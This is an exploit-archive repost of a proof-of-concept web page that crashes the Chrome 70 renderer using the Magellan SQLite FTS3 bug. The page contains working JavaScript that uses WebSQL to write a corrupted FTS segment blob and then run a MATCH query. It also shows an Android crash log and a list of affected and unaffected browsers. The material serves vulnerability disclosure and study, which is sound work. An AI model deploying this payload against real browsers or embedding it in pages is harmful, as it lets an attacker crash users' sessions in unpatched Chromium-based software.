Registergoogle chrome 70 sqlite magellan crash (poc)
▸▸▸ Exploit & Vulnerability >> dos exploit & multiple vulnerability
Online Vulnerability Scanner Tools
Code...
<!--- title: Crash Chrome 70 with the SQLite Magellan bug categories: chrome permalink: /sqlitebug/ layout: post ---!> <p>This proof-of-concept crashes the Chrome renderer process using <a href="https://blade.tencent.com/magellan/index_en.html">Tencent Blade Team's Magellan SQLite3 bug</a>. It's based on <a href="https://www.sqlite.org/src/info/940f2adc8541a838">a SQLite test case</a> from the commit that fixed the bug.</p> <p><span id="prompttext">If you're using Chrome 70 or below, tap the button below to crash this page:</span></p> <button onClick="crash()" style="font-size: 150%">Crash this page</button> <p>Your browser's user agent is: <span id="browserUserAgent">not available without JavaScript. Turn it on!</span></p> <p><a href="https://github.com/zhuowei/worthdoingbadly.com/blob/master/_posts/2018-12-14-sqlitebug.html">Source code for this page on GitHub</a>.</p> <h1>Sign up for more information</h1> <p>I'm working on understanding how this issue affects browsers. To get notified when I update this page, please sign up to my mailing list:</p> <form action="https://worthdoingbadly.us18.list-manage.com/subscribe/post?u=3f9820ca33ce6a7b1e682c9ac&id=014e6793b7&SIGNUP=inline-sqlitebug" method="post" id="mc-embedded-subscribe-form-inline" name="mc-embedded-subscribe-form-inline" class="validate" target="_blank"> <input type="email" value="" name="EMAIL" class="required email" id="mce-EMAIL" placeholder="Email"> <div style="position: absolute; left: -5000px;" aria-hidden="true"><input type="text" name="b_3f9820ca33ce6a7b1e682c9ac_014e6793b7" tabindex="-1" value=""></div> <input type="submit" value="Subscribe" name="subscribe" id="mc-embedded-subscribe" class="button"> </form> <h1>What's supposed to happen?</h1> <p>After you press the button, the page should crash:</p> <p><img src="/assets/blog/sqlitebug/sqlite_cropped.png" alt="screenshot"></p> <p>On Android 5.1, I get a segfault in memcpy:</p> <pre style="font-size: 10px"> F/libc ( 3801): Fatal signal 11 (SIGSEGV), code 1, fault addr 0xe0ddb457 in tid 3854 (Database thread) I/DEBUG ( 142): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** I/DEBUG ( 142): Build fingerprint: 'google/nakasi/grouper:5.1/LMY47D/1743759:user/release-keys' I/DEBUG ( 142): Revision: '0' I/DEBUG ( 142): ABI: 'arm' I/DEBUG ( 142): pid: 3801, tid: 3854, name: Database thread >>> com.android.chrome:sandboxed_process6 <<< I/DEBUG ( 142): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0xe0ddb457 I/DEBUG ( 142): r0 e0ddb457 r1 611be0ab r2 00000002 r3 ff000000 I/DEBUG ( 142): r4 611be038 r5 00000002 r6 611be0a9 r7 7fffffff I/DEBUG ( 142): r8 00000001 r9 611be0ab sl 80000001 fp 00000000 I/DEBUG ( 142): ip 00000066 sp 6defd3a0 lr 00000074 pc 4025eb62 cpsr 680f2430 I/DEBUG ( 142): I/DEBUG ( 142): backtrace: I/DEBUG ( 142): #00 pc 0000fb62 /system/lib/libc.so (__memcpy_base+217) I/DEBUG ( 142): #01 pc 018d0e1d /data/app/com.android.chrome-1/base.apk </pre> <h1>What's affected?</h1> <p>Affected: tested, causes one tab/one window to crash:</p> <ul> <li>Chrome 70.0.3538.110 on Android 5.1 and 9</li> <li>Electron 2.0.12 on macOS 10.14</li> </ul> <p>Not affected:</p> <ul> <li>Chrome 71.0.3578.98 on Android 8.1 (already fixed)</li> <li>Safari (doesn't have FTS enabled in SQLite3)</li> <li>Browsers not based on Chrome (no WebSQL support)</li> </ul> <script> // https://gist.github.com/nolanlawson/0264938033aca2201012 // https://www.sqlite.org/src/info/940f2adc8541a838 const db = openDatabase('fts_demo', 1, 'fts_demo', 5000000); const firstStatements = [ "DROP TABLE IF EXISTS ft;", "CREATE VIRTUAL TABLE ft USING fts3;", "INSERT INTO ft VALUES('aback');", "INSERT INTO ft VALUES('abaft');", "INSERT INTO ft VALUES('abandon');", ]; const secondStatements = [ "SELECT quote(root) from ft_segdir;", "UPDATE ft_segdir SET root = X'0005616261636B03010200FFFFFFFF070266740302020003046E646F6E03030200';", "SELECT * FROM ft WHERE ft MATCH 'abandon';" ]; function dbSuccess() { console.log("success"); console.log(arguments); } function dbErr() { console.log("err"); console.log(arguments); } function runAll(statements, success) { db.transaction((tx) => { console.log("alive"); for (const statement of statements) { console.log("queueing " + statement); tx.executeSql(statement, [], dbSuccess, dbErr); } console.log("queued"); }, dbErr, success); } function crash() { runAll(firstStatements, (event) => { console.log(event); runAll(secondStatements, (event) => { console.log(event); }); }); } // onload function getChromeVersion(userAgent) { for (const part of userAgent.split(" ")) { if (part.startsWith("Chrome/") || part.startsWith("Chromium/")) { return part.substring(part.indexOf("/") + 1); } } return null; } function isChromeSupported(chromeVersion) { if (chromeVersion == null) return false; const firstPart = chromeVersion.substring(0, chromeVersion.indexOf(".")); return parseInt(firstPart) <= 70; } function getPromptText(userAgent) { const chromeVersion = getChromeVersion(userAgent); if (chromeVersion == null) { return "This demo only works on Chrome 70 or below. Open this page in Chrome 70, then tap the button."; } const chromeOK = isChromeSupported(chromeVersion); if (chromeOK) { return "You're using Chrome 70 or below, so you may be vulnerable. Tap the button to crash this page."; } return "Your Chrome is too new. Open this page in Chrome 70, then tap the button."; } function onLoad() { document.getElementById("browserUserAgent").textContent = navigator.userAgent; document.getElementById("prompttext").textContent = getPromptText(navigator.userAgent); } window.onload = onLoad; </script>
Google chrome 70 sqlite magellan crash (poc) Vulnerability / Exploit Source : Google chrome 70 sqlite magellan crash (poc)
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes